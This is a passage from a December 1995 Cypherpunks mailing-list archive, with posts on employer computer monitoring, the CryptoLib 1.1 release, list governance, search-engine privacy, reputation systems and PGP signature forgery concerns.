uses on *my* computer. (There are several on this list who disparage what they call the "libertarian emphasis on property rights over human rights," or somesuch. Fact is, property rights are central to all human rights. In the case of my employee using my computer, the concept of "his" human rights makes little sense: there is no "democracy" in corporations, as we normally think of democracy. Nor is there any "right of free speech," and so on. You may not like this, but this is the way it is, and should be.) I can't cite case law about "employee privacy," not being a lawyer, but I know that companies routinely restrict the uses to which their computers are put (video games, gambling, accessing porn are some obvious examples) and employees have very little to say about it. Furthermore, companies may need to look at hard drives to see if pirated software which could expose them to millions of dollars in damages (and raids by the SPA cops). I may not _like_ the fact that my employer (if I had one) is rooting through my hard disk, but it is, after all, his computer, and his liability if I am using his computers for illegal or unprofessional purposes. The courts have granted certain types of employee privacy, about things like the contents of purses and briefcases (though both of these examples can and do face inspections, as I faced when I worked for Intel). And monitoring of phone conversations now has a set of rules associated with it. But employers can always restrict what kinds of programs can be run on their computers. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From mab at research.att.com Thu Dec 28 06:32:28 1995 From: mab at research.att.com (Matt Blaze) Date: Thu, 28 Dec 1995 22:32:28 +0800 Subject: New! Improved! CryptoLib 1.1 now available. Message-ID: <199512280557.AAA19317@nsa.tempo.att.com> [Note: This is posted on behalf of Jack Lacy, whose news posting software is hopelessly broken; please direct responses to him at cryptolib at research.att.com. Jack spent the better part of the last two weeks getting a new release of CryptoLib out the door. This version, which should be stable for a while, fixes a few x86 problems, improves the interfaces to some of the functions, and now allows you to use your own random number generator to create key material. If you don't already have CryptoLib, be the first nerd on your block to get the new release. -matt] ======== Announcing CryptoLib - Release 1.1 12/21/95 Jack Lacy, AT&T Bell Labs CryptoLib is a portable and efficient library of primitives for building cryptographic applications. It runs under most versions of Unix as well as DOS, Windows and Windows-NT (and 95). We are pleased to make CryptoLib source code available without charge to researchers and developers in the US and Canada. (Because of export restrictions on cryptographic software, we are only able to make the software available within the US and Canada to US and Canadian citizens and US permanent residents.) CryptoLib is intended for research and experimental use, and is distributed without warranty or support. In particular, please note the following license conditions: * Copyright (c) 1995 by AT&T. * Permission to use, copy, and modify this software without fee * is hereby granted, provided that this entire notice is included in * all copies of any software which is or includes a copy or * modification of this software and in all copies of the supporting * documentation for such software. * * This software may be subject to export controls. * * NOTE: * Some of the algorithms in cryptolib may be covered by patents. * It is the responsibility of the user to ensure that any required * licenses are obtained. * * SOME PARTS OF CRYPTOLIB MAY BE RESTRICTED UNDER UNITED STATES EXPORT * REGULATIONS. * * * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED * WARRANTY. IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE. The attached describes the library and some timing results. To obtain source code send electronic mail to: cryptolib at research.att.com with a statement of the following form: "I am a U.S. or Canadian citizen or a legal permanent resident of the U.S. and am aware that some parts of CryptoLib may be restricted under United States Export regulations and may be covered under various US and/or foreign patents. I have read and understand the CryptoLib license." Name: Location: E-mail: Are you licensed to use the RSA patent? If yes, give name of licensed organization: =============================================================================== CryptoLib includes the following: arbitrary length bignums. bigmath package: bigAdd, bigSubtract, bigMultiply, bgiDivide, bigLeftShift, bigRightShift, bigAnd, bigOr, bigXor, bigCopy, Euclid's extended GCD, modular reduction and exponentiation crypto primitives DES and 3DES + modes Diffie-Hellman DSA (Signing and verification roughly equally efficient) El Gamal Rabin's scheme Random Number generation (PSEUDO and TRUE) MD[2,4,5] Prime generation RSA (provided only if you convince me that you have a license) SHA truerand (For Unix, NT and 95) quantization (Defense against Kocher's timing attack) quantized RSA, DSA and El Gamal private key operations. support functions asn1.c ioutils.c netIface.c Some timing information: All times assume 32X32 bit assembly of multiplication primitives. bigPow times (a^b mod c with a,b,c the same length) 512 bits 1024 bits -------- --------- bigPow 0.12s 0.72s Sparc II Brickell bigpow 0.43s 3.0s Sparc II with asm (gcc) 0.12s 0.78s Sparc 10 with asm 0.03s 0.17s Sparc 10 with asm (Brickell) 0.084s 0.45s SGI Indigo (150MHz) 0.109s 0.75s 100 MHz Pentium (gcc under DOS) Strong Prime Generation -- ProbTestAttempts = 5 100 primes generated in each test. Times below are: (total test time)/100 = avg. time per prime generated. Using Gordon's strong prime algorithm. 256 512 1024 Machine --- --- ---- ------- 2.8s 24.0s 5.11m Sparc II .45s 2.7s 77s 100 MHz pentium RSA Times (64 bit public exponent, message encrypted is full length) --------- 512 768 1024 bits machine --- --- --------- ------- encrypt 30ms 50ms 80ms sparc II decrypt 160ms 480ms 930ms encrypt 15ms 33ms 56ms 100 MHz Pentium (Under NT) decrypt 38ms 104ms 214ms DSA Times --------- 512 768 1024 bits machine --- --- --------- ------- sign 99ms 166ms 216ms sparc II (Brickell speedup) verify 156ms 316ms 416ms sign 21ms 38ms 49ms 100 MHz Pentium (Under NT) verify 27ms 43ms 71ms From jirib at sweeney.cs.monash.edu.au Thu Dec 28 06:40:35 1995 From: jirib at sweeney.cs.monash.edu.au (Jiri Baum) Date: Thu, 28 Dec 1995 22:40:35 +0800 Subject: proposal for new cyber abbreviation In-Reply-To: <199512271947.LAA22943@netcom17.netcom.com> Message-ID: <199512280403.PAA10201@sweeney.cs.monash.edu.au> -----BEGIN PGP SIGNED MESSAGE----- Hello, "Vladimir Z. Nuri" wrote: > yes, cyberspace just doesn't have enough acronyms like AFAIK and IANAL etc. > ad nauseam. (I have reason to believe that PTB, or "powers that be" was ... > SHTBD!!!! > > as in, Something Has To Be Done. ... Proposed extension: SHTBD/ eg: There's a paedophile on the Internet! SHTBD/PTB! PTB're trying to regulate cyberspace! SHTBD/EFF! PTB're pushing GAK! SHTBD/C'punks! And so on. After all, all sides can cry "SHTBD", can't they? (Home users may prefer the alternate syntax SHTBD\, ie SHTBD\PTB, SHTBD\EFF, SHTBD\C_PUNKS etc :-) ... > used either seriously or satirically (probably mostly satirically by > everyone here). > > example: ... > "I was not implying that SHTBD, merely that we are moving into a brave > new world in cyberspace". How about something like: "I was not implying that SHTBD/PTB to stop it, but that SHTBD/us to support it/deploy it/get ready for it." ... > notice that SHTBD is the antithesis of cypherpunk philosophy in that > it tends to imply > > 1. government intervention Hence the addition of the field... > 2. coercive force > 3. censorship ... Yet one of your examples implied the opposite - sorry, I nuked it, but it was about the media picking bogeymen. ... > hence by using this term and popularizing it, we promote our own agenda > of "cryptoanarchy". ... Fortunately for the anarchists, perhaps, an authoritarian government is isomorphic to anarchy. Jiri - -- If you want an answer, please mail to . On sweeney, I may delete without reading! PGP 463A14D5 (but it's at home so it'll take a day or two) PGP EF0607F9 (but it's at uni so don't rely on it too much) -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMOIXESxV6mvvBgf5AQEOBQQA7ShSGoioMAb6CF5ot0sxu57hvBwMDJDw MmkBLnPXvoYaL8dOEc5uYhdtLa8hkPapXT3NEUywI1SDDx7QUc4YgbzfQCQNAgz0 HYlfUlL1SA1N7JQIiyHEBN+jWaldzEGGflLxJPy83vm4N1pyo0gluzzi2hMJigcD FgU3G8LjcoE= =aBT9 -----END PGP SIGNATURE----- From doug at Eng.Auburn.EDU Thu Dec 28 06:41:41 1995 From: doug at Eng.Auburn.EDU (Doug Hughes) Date: Thu, 28 Dec 1995 22:41:41 +0800 Subject: another anonymous poster helping to destroy our rights In-Reply-To: <199512272022.MAA25782@netcom17.netcom.com> Message-ID: On Wed, 27 Dec 1995, Vladimir Z. Nuri wrote: > > so far the "authorities" are those who have been on a the list a long time. > (it is still an informal system however). this is a reasonable system. > but I object to the way that people such > as PM argue in one message that "there is no such thing as the cypherpunks" > but then endlessly determine themselves what is appropriate for the list. > doesn't anyone see the inconsistency-at-best-and-hypocrisy-at-worst of this? No, what's appropriate is what's in the charter. Stuff related to cryptography and its offshoots. Conspiracy du-jour is totally unrelated, and Perry is right, it doesn't belong. I don't see why that's so hard to understand. Perry isn't acting as a list owner, but the subconscious reminder to "stick closer to the charter". He's a bit billious, but it helps to cut out the drivel, so I don't mind so much. They (I) object when something is labelled as cypherpunk because many of the people on this list have completely opposite views on different topics. There is no gestault. A mailing list does not make a common personality. ____________________________________________________________________________ Doug Hughes Engineering Network Services System/Net Admin Auburn University doug at eng.auburn.edu Pro is to Con as progress is to congress From blancw at accessone.com Thu Dec 28 06:43:28 1995 From: blancw at accessone.com (blancw at accessone.com) Date: Thu, 28 Dec 1995 22:43:28 +0800 Subject: another anonymous poster helping to destroy our rights Message-ID: <9512280551.AA13342@pulm1.accessone.com> From: "Vladimir Z. Nuri" you can't have it both ways. either anyone is free to decide what a cypherpunk is, and no one has the right to argue with it. or, cypherpunks are something in particular, and someone has the authority to determine that. ............................................ So are you saying that "SHTBD!!!!"? :>) As you note, it is an informal system which operates on the list. As you also note, an "intelligent and mischievous adversary" can effectively create problems. But you failed to note that intelligent and technically savvy members will find effective ways to deal with it. That is what is important about an 'anarchic' list like this - that the challenge of maintaining rational discourse is met by the application of active intelligence, rather than all the rigmarole you mentioned. And this is what makes it interesting, I think. Any person's ideas or concepts or contributions can be tested or challenged by the more knowledgeable on the list, if they are so moved (or not, if they are not so moved). The organizing subject around which discussions revolve is crypto, within the social context. Because of this, the relationship to the main subject is difficult to maintain. (And isn't this list like a microcosm, at times, of the larger social picture?) It is the unexpurgated exchanges of thought & expression, which regulate the list. It reminds me of a book about life: You Learn, or You Die. .. Blanc From bplib at wat.hookup.net Thu Dec 28 06:43:48 1995 From: bplib at wat.hookup.net (Tim Philp) Date: Thu, 28 Dec 1995 22:43:48 +0800 Subject: DejaNews and Alta Vista Search Tools, and Privacy Implications In-Reply-To: Message-ID: I was interested in your comments re DejaNews because of an experience that I had about a month ago. I received mail from Rick Broadhead, a co-author of the Canadian Internet Guide. He wanted to know if I was the Tim Philp who wrote a computer column for the Brantford Expositor and if so, would I be interested in reviewing his new books. It seems that he got my name from a clipping service because I had mentioned his first book in my column. As I did not include my E-mail address in my column, he used DejaNews to search for Tim & Philp. Bingo! my name poped out from an old Cypherpunks list posting. In this case it was good as I was interested in talking to him, but the possibilities for privacy invasion are great. In any case, I got an article out of the experience. I think that it will be interesting when some of the future politicians who are now just kids playing on the Internet are presented with some of their juvenile rantings when they are 40 years old and running for office. The mind boggles! Regards, Tim Philp Brantford, Ont., Canada =================================== For PGP Public Key, Send E-mail to: pgp-public-keys at swissnet.ai.mit.edu In Subject line type: GET PHILP =================================== From tallpaul at pipeline.com Thu Dec 28 06:55:17 1995 From: tallpaul at pipeline.com (tallpaul) Date: Thu, 28 Dec 1995 22:55:17 +0800 Subject: Only accepting e-mail from known parties Message-ID: <199512280309.WAA23655@pipe10.nyc.pipeline.com> [I mistakenly failed to post the original message to which A.J. Stuckey responded to the entire group. I have corrected this error. However, A.J. Stuckey quoted enough of the original to have his questions comprehensible so I'll reply to them here without waiting for the original to be sent to the list.] On Dec 27, 1995 15:50:55, '"Anthony J. Stuckey" ' wrote: >In uiuc.mlist.cypherpunks you write: >>We live in a post-Faustian world. >> >>It is divided into two groups of people. First are those who understand the >>post-Faustian character and devote themselves to getting used to it and >>even having fun with the new opportunities while understanding that the new >>world also generates new problems (like furthering data-narcicism). Second >>are those classic-reactionary forces (from all parts of the political >>spectrum) who whine about how the post-Faustian world is personally unfair >>to them and how everybody in the world has a personal obligation to them to >>move the world back to its pre-Faustian origins. > > Just what exactly defines a "post-Faustian" world? That we're aware >people will sell their souls for power? >-- I wasn't a matter of people selling their souls for power or that we're aware of it. My original reference was to one view on our society (not necessarily reflected on the list) that we must "avoid the Faustian bargain." Gee, I hated to inform them that the Faustian bargain had already been made and made anywhere from hundreds to tens of thousands of years ago. In this sense, we live in a post-Faustian [bargain] world. The bargain, so to speak, was not about knowledge or power or other such things. Those were involved only in the negotiating stages of the contract. The *real* bargain occured when Faust stated: "And if I should ever say, "'Oh moment stay!' "Thou art so fair!' "I *deserve* to perish "Then and there. _Faust_, Part I, Goethe We are all caught in a process that can not be even stopped let alone turned back without damnation. We need not like this; we need not support it; we can even pull the covers over our heads and refuse to recognize it. But the bargain and process exists nonetheless. There are Group One people, like (most) cypherpunks and others who understand the bargain has been made, who accept the world, and who may even have fun participating in a continuing and ever changing process. E.G. the microprocessor was invented. This created the possibility of things like PGP that in turn created the first opportunity in the history of the world for the average man and woman to have privacy as (pretty) good as any government *if they were willing to provide themselves that privacy.* The same invention also meant the greatest invasion of privacy through computerized lists at credit card companies, etc. Now personally I like PGP and do not personally like credit company's data bases. But both exist in the world and I recognize the inevitability of both. The you have Group Two people who whine about how the development of the microprocessor created a world they don't like, that is unfair to them, that is based on the Faustian bargain, etc. etc. To them, the world says (if it bothers to say anything at all) "Tough!" Now am I inclined to give up either PGP or my Pentium because these necessarily exist in the same world with the credit companies they do not like. To use another example: we have the internet and we have a _de jure_ freedom of speech. Group One people like the net, even if it means that a few people are going to send "kiddie porn" over the wires instead of looking at the old "kiddie underwear" ads in the _Sears_ catalog. Group Two people are fearful of the net and hate it, frequently attempting to rationalize their fears by reference to "kiddie porn," "drugs," "terrorists," etc. They want their fears to dominate both the net and freedom of speech on a global level. "If it doesn't play in Peoria then it shouldn't play in Denmark," etc. Group One people say in essence that "kiddie porn" is a small price to pay for the net and expanded freedom of speech; Group Two people say in essence that the net is too high a price for "kiddie porn" and let us also reduce freedom of speech while we're at it. As I wrote, it is a post-Fastuain world and none of us can go home to the pre-Faustian world ever again. ==tallpaul From EALLENSMITH at ocelot.Rutgers.EDU Thu Dec 28 07:06:23 1995 From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) Date: Thu, 28 Dec 1995 23:06:23 +0800 Subject: Telcom bill report Message-ID: <01HZBAWIUN7C8Y55DD@mbcl.rutgers.edu> From: IN%"futplex at pseudonym.com" 21-DEC-1995 18:57:06.16 >> Here's the additional info from Reuters. As usual, Clinton is being a > coward. How do you figure ? > Vice President Gore says President Clinton will sign the bill. Before > the agreement, the president had been threatening for months to veto > the bill if Republicans in Congress did not retreat on a long list of ~~~~~~~~~~~ > issues. They retreated. ~~~~~~~~~~~~~~ Clinton won on this. The Administration does not appear to have altered its position on this substantially. ---------- I am calling Clinton a coward for giving in to the Christian Coalition and not vetoing this bill due to the censorship portion. He evidently decided that following his oath of office and upholding the First Amendment wasn't worth the "porn supporter" criticism Ralph Reed and his lot would direct his way. -Allen From DMiskell at envirolink.org Thu Dec 28 07:07:23 1995 From: DMiskell at envirolink.org (Daniel Miskell) Date: Thu, 28 Dec 1995 23:07:23 +0800 Subject: another anonymous poster helping to destroy our rights Message-ID: <9512280525.AA05396@envirolink.org> You know, you are really starting to annoy me with this $*i+ about how anon users are destroying our rights by abusing theirs. If you dont like it, ignore it. but stop cluttering bandwith with your aimless complaints. if you want cypherpunks to do somthing, SUGGEST somthing! Stop wining and shut up!! *sigh* its like people cannot handle their own problems today, except by bleating to the public. I am requesting that anybody who has a problem with anon users TALK TO THE OWNER OF THE LIST. Munster --- _________________________________ *!Cheese Doctrine:!* Though cultured over time, and aged to perfection, one must not yield to produce mold. One must also not belittle themselves by conforming to the "whiz", but melt over the unprocessed ideas of Ghuda. _________________________________ From weidai at eskimo.com Thu Dec 28 07:18:44 1995 From: weidai at eskimo.com (Wei Dai) Date: Thu, 28 Dec 1995 23:18:44 +0800 Subject: Reputation capital: FIBS case study In-Reply-To: <2sY4wMz2BcRC083yn@mail.msen.com> Message-ID: On Wed, 27 Dec 1995, Lou Poppler wrote: > The thorniest problem in our reputation economy continues to be the > case of the player who drops out of a match when clearly losing, to avoid > the decrement of his rating number (based on match results only, not on > individual games). [......stuff deleted...] The best defense we have > found against the match dropper is complaining in the newsgroup. It seems to me the easiest way to solve this problem is to list for each player the number of games he dropped and didn't finish along with his rating and experience. Why go for elaborate social solutions when a simple technical solution exists? Wei Dai From alby at empire.org Thu Dec 28 07:25:21 1995 From: alby at empire.org (Albatross) Date: Thu, 28 Dec 1995 23:25:21 +0800 Subject: BoS: Re: Misconfigured Web Servers In-Reply-To: Message-ID: <199512280308.WAA09007@empire.org> > > On Wed, 27 Dec 1995, David Klur wrote: > > > > > Re: the "trick" below... an even more effective search is the > > following... > > > Is it just me, or is everyone getting a dozen of these? Yup! I'm also receiving a ton.. -Alby From usura at utopia.hacktic.nl Thu Dec 28 07:40:30 1995 From: usura at utopia.hacktic.nl (Alex de Joode) Date: Thu, 28 Dec 1995 23:40:30 +0800 Subject: Announcing a new alpha release of premail Message-ID: <199512281108.MAA08509@utopia.hacktic.nl> You sez: : This is to announce that premail version 0.42 is now available. It : is a full alpha version of the new premail, containing all the : features and functions planned for the production release. [..] : If you are in the US or Canada, you can download premail now, from : the premail Distribution Authorization Form: : http://kiwi.cs.berkeley.edu/premail-form.html : Raph Levien ftp://ftp.hacktic.nl/pub/replay/pub/incoming From frantz at netcom.com Thu Dec 28 08:53:23 1995 From: frantz at netcom.com (Bill Frantz) Date: Fri, 29 Dec 1995 00:53:23 +0800 Subject: Only accepting e-mail from known parties Message-ID: <199512270801.AAA11744@netcom9.netcom.com> At 14:53 12/25/95 -0500, Adam Shostack wrote: > The basic problem is that (personal) spam is a social, not a >technical problem. If someone wants to annoy you via the internet, >they can do so. You can raise the cost of their annoying you, but you >need to be careful not to make it difficult to talk to you. It seems to me that one of the technical problems of the personal spam is the way it can grow into a denial of service attack on your system. If it takes you more horsepower to filter the spam than it takes to generate it, then you are particulary vunerable. ----------------------------------------------------------------- Bill Frantz Periwinkle -- Computer Consulting (408)356-8506 16345 Englewood Ave. frantz at netcom.com Los Gatos, CA 95032, USA From dee at cybercash.com Thu Dec 28 10:43:02 1995 From: dee at cybercash.com (Donald E. Eastlake 3rd) Date: Fri, 29 Dec 1995 02:43:02 +0800 Subject: Cybercash security In-Reply-To: <9512271711.AA13714@hosaka.smallworks.com> Message-ID: The current plans include a way to link your CyberCash persona with a bank account (DDA). If you have done that and there is cash in your CyberCash persona, you would be able to transfer it to the bank account. Using ACH, this operation typically happens overnight. Donald On Wed, 27 Dec 1995, Jim Thompson wrote: > > The thing I'd like to understand about Cybercash is... how do I get the > cash back out of the system? > > ===================================================================== Donald E. Eastlake 3rd +1 508-287-4877(tel) dee at cybercash.com 318 Acton Street +1 508-371-7148(fax) dee at world.std.com Carlisle, MA 01741 USA +1 703-620-4200(main office, Reston, VA) From fc at all.net Thu Dec 28 10:43:06 1995 From: fc at all.net (Fred Cohen) Date: Fri, 29 Dec 1995 02:43:06 +0800 Subject: Reputation capital: FIBS case study In-Reply-To: Message-ID: <9512281414.AA21403@all.net> > On Wed, 27 Dec 1995, Lou Poppler wrote: > > > The thorniest problem in our reputation economy continues to be the > > case of the player who drops out of a match when clearly losing, to avoid > > the decrement of his rating number (based on match results only, not on > > individual games). [......stuff deleted...] The best defense we have > > found against the match dropper is complaining in the newsgroup. > > It seems to me the easiest way to solve this problem is to list for each > player the number of games he dropped and didn't finish along with his > rating and experience. Why go for elaborate social solutions when a > simple technical solution exists? > > Wei Dai It seems to me that not finishing a game is the same as knocking over the board. It's a loss for the player waiting to move, and a non-game for the other player. This should solve the not-finishing-a-game problem in short order. For the problem of playing a fake unrated player, try variations on this scheme. Track the players each player plays and reevaluate all players scores in relative terms. To get a rating, players must engage in games with enough other players to form a valid statistical basis - at least 100 games with rated players for 10% accuracy. Start with provisional ratings in the 1-10 range based on comparrison with other players regardless of who. As players play other fully rated players, add a temporary rating based on relative performance and post both relative and 1-10 ratings. When players reach 100 games within the rated group, they get an official rating. -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From jya at pipeline.com Thu Dec 28 11:04:04 1995 From: jya at pipeline.com (John Young) Date: Fri, 29 Dec 1995 03:04:04 +0800 Subject: DOP_lip Message-ID: <199512271913.OAA21386@pipe1.nyc.pipeline.com> 12-27-95. WashP: The CIA's close-rankled directorate of operations aim to trashtalk Deutch out of depensioning the veteran Paris CoS for French economic spay of pigs. DOP_lip From dmandl at bear.com Thu Dec 28 11:42:51 1995 From: dmandl at bear.com (David Mandl) Date: Fri, 29 Dec 1995 03:42:51 +0800 Subject: Employer Probing Precedents? In-Reply-To: <199512272151.QAA05241@bb.hks.net> Message-ID: On Wed, 27 Dec 1995 Jason D. Livingood/WSC at hks.net wrote: > To Whom It May Concern: I was > curious as to where I might find some electronic freedom legal > precedents. If, for example, an employer was planning to probe file > systems on PCs in the off-hours and employees began encrypting their > hard drives, what legal precedents would support the employees or > would support the employer in blocking the encryption? Thanks for > any info you can give me!! You want to take a look at the ECPA (stands for Electronic Communications Privacy Act--I think). I don't have URLs handy, but it should be easy enough to find via Alta Vista or Yahoo. The way I understand it, though there are fairly strict limits on the snooping your employer can do, you waive more or less all your privacy rights if you sign a form saying you "consent" to the snooping. Your encryption question falls in kind of a grey area (most of the ECPA deals with reading people's email, etc.), but it's probably covered in there somewhere. I have very strong feelings about this subject, but I'll keep them to myself for now since I'm posting from work. We were all informed a week or two ago that Bear Stearns is now archiving every piece of email coming into or leaving the company. All I'll say here is that I disagree strongly with the views Tim May posted about employees' property rights, etc. (though we agree on most other things). --Dave. -- ******************************************************************************* Bear Stearns is not responsible for any recommendation, solicitation, offer or agreement or any information about any transaction, customer account or account activity contained in this communication. ******************************************************************************* From dmandl at bear.com Thu Dec 28 11:43:37 1995 From: dmandl at bear.com (David Mandl) Date: Fri, 29 Dec 1995 03:43:37 +0800 Subject: Employer Probing Precedents? In-Reply-To: Message-ID: On Thu, 28 Dec 1995, I wrote: > All I'll say here is that I disagree strongly with the views Tim May > posted about employees' property rights, etc. (though we agree on most > other things). Um, I meant employers' rights, obviously. --Dave. -- ******************************************************************************* Bear Stearns is not responsible for any recommendation, solicitation, offer or agreement or any information about any transaction, customer account or account activity contained in this communication. ******************************************************************************* From dlv at bwalk.dm.com Thu Dec 28 12:16:40 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Fri, 29 Dec 1995 04:16:40 +0800 Subject: Only accepting e-mail from known parties In-Reply-To: <199512251953.OAA01614@homeport.org> Message-ID: I think the underlying problem is that the way PGP signatures are used by most people, they validate a text, but allow it to be quoted out of context in an e-mail or Usenet forgery. E.g., suppose Alice posts a PGP-signed text in alt.sex. Bob forges a Usenet article in misc.kids, making it look like it came from Alice and quoting her PGP-signed body. Alice will have a tough time convincing the public that she didn't post it -- after all, her signature verifies. (There are many people on the net who don't comprehend the argument that the Path: is clearly bogus). Or: Bob writes Alice a sexually explicit letter and forgets to say "Dear Alice" in the signed block. Alice forges an e-mail to Carol, making it look like it came from Bob and quoting the signed block. Bob would have to realy on the analysis of Received: headers to repudiate such a forgery. I suggest to the kind folks working on PGP 3 that there should be a standard protocol to include within the signed portion the information on when and for whom this text is written: i.e. the list of e-mail recipients and/or Usenet newsgroups, which could be easily compared with the RFC 822/1036 headers of an e-mail/Usenet article. Perhaps there could be a new option for PGP to look _outside_ the signed block and match the headers with what's inside the block. E.g., suppose the signature block says: this text was written by alice at zog.org, posted to alt.sex and alt.sex.banal and e-mailed to bob at masons.com. Suppose PGP is asked to check the signature in a file that purports to be a e-mail or a Usenet article and has some headers before the signed portion. If there is a list of To: recipients, and it includes someone other than the recipients listed within the signed block; or if there is a Newsgroups: header, and it includes newsgroups not listed within the signed portion; then the input is bogus. For compatibility with the existing software, if the signed block doesn't include this info, then this checking should't be done, of course. (Yes, one could do this with a wrapper to PGP, making the whole thing even more user-hostile.) --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From tcmay at got.net Thu Dec 28 12:17:42 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 29 Dec 1995 04:17:42 +0800 Subject: DejaNews and Alta Vista Search Tools, and Privacy Implications Message-ID: (Side note: I seem to have returned from my holiday away from this area and away from computers to a war zone, with multiple flames and threats of legal action. Being a part of the Cypherpunks group, and potentially part of the "criminal conspiracy" to defame, am I included in the lawsuits? I wonder.) Anyway, a point of clarification of a point, lest there be the belief that _all_ Cypherpunks are opposed to comprehensive Web search tools: At 8:46 PM 12/23/95, Steven L. Baur wrote: >Furthermore, no one has mentioned the positive changes made to ^^^^^^^^? >Dejanews since it got bashed thoroughly on this list a few weeks ago. >They've significantly turned down the amount of old information >indexed, and have restricted the groups (and mailing lists) they >archive. I for one don't consider this to be a positive development. Reducing the time horizon for searches has no real effect on the compilation of dossiers (for example), but certainly makes DejaNews less useful. (And I'd be willing to bet that the time horizon was scrunched down for space and time reasons, not for reasons of privacy; the horizon will likely _increase_ as users ask for, and perhaps are willing to pay a bit for, longer time horizons.) And I don't believe the dominant thinking of folks who commented was that DejaNews was worthy of "bashing." In fact, I found it all very interesting, and a confirmation of what many of us expected would soon happen, i.e., fast access to past comments. I think I and several others commented on the major implications for privacy, especially vis-a-vis the way corporations will be able to see compilations of postings to "outrageous" groups. Indeed, I know of some people hiring programmers who are already using such tools to get a better understanding of whom they may be hiring, or not. But my comments were not in the vein of "something has to be done," but of recognition that a Brave New World is fast unfolding. Thinking that one is "safe" because a particular search service is not including all the groups or mailing lists it _could_ include is illusory (one is reminded of ostriches....). The same thinking happened several years ago when a great hue and cry in the media caused Lotus to abandon plans to sell a CD-ROM to individuals with publically available census and other data on it about neighborhoods, phone numbers, etc. Inasmuch as the non-individual entities (corporations, mass mailers, courts, law enforcement, etc.) already have full access to such databases, all the hue and cry really accomplished was to give individuals a false sense of security and privacy. A triumph of feelgood style over substance. Real privacy and security comes from steps taken to make the information private in the first place, not to ex post facto limit access. (I am not claiming that Steven Bauer or anyone else on our list is calling for laws to limit Web search engines, just giving my views about this. As a matter of fact, however, I am hearing rumblings in other places that "there ought to be a law" about these archives, indexes/indices, etc. Same old story. Kind of hard to enforce such laws when the indexes are in Holland, or Byelorussia, or "somewhere in cyberspace." ) Face it, every single word written by any of us to any Usenet newsgroup, going back to the beginning of Usenet, and expanding out to many ostensibly-private mailing lists, will fairly soon be searchable. (Add some digital cash and proxy/remailer features, and someone will be incentivized to put some really big arrays of optical disks up for searching. And if the U.S. tries to "regulate" such searches....well, I'm preaching to the choir here....) --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From dsmith at midwest.net Thu Dec 28 12:38:43 1995 From: dsmith at midwest.net (David E. Smith) Date: Fri, 29 Dec 1995 04:38:43 +0800 Subject: Proxy/Representation? Message-ID: <199512281517.JAA13397@cdale1.midwest.net> Caveat: I haven't yet looked through the archives, and it's late. This may sound even less intelligent than most of what's on the list as of late (although what with the flamewars about I'm not sure if that's possible). Today I made a purchase at a local store using a personal check that wasn't mine. It very clearly wasn't mine (since the name on the check was Helen and mine is Dave), but I am a duly appointed representative of Helen in certain affairs. Including this one, which was grocery shopping . (There are also other affairs, some with actual legal consequences, and there is paperwork to that effect in a lawyer's safe somewhere.) The question is: how do the current software packages handle representatives and proxies for a given is-a-person? Using PGP as an example, I can't sign a message with Helen's key. And a message signed with my key won't hold as much weight because "Dave" is not "Helen." And if every message I send on behalf of Helen has to be followed up by a message from Helen stating "yes, Dave may act on my behalf for this instance" then much of the point of the proxy process is lost. (i.e. the reduction of Helen's workload etc.) I'm sure that this has already popped up, so I'll just ask for pointers. dave ----- David E. Smith, c/o Southeast Missouri State University 1210 Towers South, Cape Girardeau MO USA 63701-4745, +1(573)339-3814 PGP ID 0x92732139, homepage http://www.midwest.net/scribers/dsmith/ Dec15-Jan15: (618)244-3340/2209 Perkins, Mt Vernon IL 62864 From jya at pipeline.com Thu Dec 28 13:15:43 1995 From: jya at pipeline.com (John Young) Date: Fri, 29 Dec 1995 05:15:43 +0800 Subject: VEL_cro Message-ID: <199512281327.IAA15628@pipe4.nyc.pipeline.com> 12-28-95. NYPaper reports on Communications Security Establishment's spying on citizens and allies, citing Jane Shorten's unzips (earlier bared here). Deputy PM Sheila Copps velcros fig leaf, "If, in fact, there has been illegal activity going on, we'll want to deal with that in as public a way as possible." VEL_cro From tallpaul at pipeline.com Thu Dec 28 13:50:08 1995 From: tallpaul at pipeline.com (tallpaul) Date: Fri, 29 Dec 1995 05:50:08 +0800 Subject: Only accepting e-mail from known parties Message-ID: <199512271205.HAA08576@pipe9.nyc.pipeline.com> On Dec 27, 1995 00:50:13, '"Robert A. Rosenberg" ' wrote: >At 13:23 12/26/95, tallpaul wrote: > >>I hadn't picked up the problem you mentioned. Thanks for pointing it out. >> > >You're welcome - You _did_ ask for comments/analysis . > I wasn't being sarcastic with the "thank you" and I don't usuallly treat criticism as a neo-flame. As you may have inferred from other posts of mine, I am more interested and knowledgable about the social aspects of the privacy/crypto/anon debates then the code/algo aspects. I know other peoplw who share my interests but who proceed to write, publish, comment on the tek issues without understanding them. Getting a better understanding of them is one of the reaons I'm on the list. Sometimes I'll venture a view on one of the tek issues, in part to test by knowledge of those issues from the tek angle. Criticism is first a small price to pay for the ability to do this. Second, it improves my knowledge of the tek. --tallpaul From bart at netcom.com Thu Dec 28 13:50:17 1995 From: bart at netcom.com (Harry Bartholomew) Date: Fri, 29 Dec 1995 05:50:17 +0800 Subject: (fwd) RSA CEO Bidzos on USML/ITAR Message-ID: 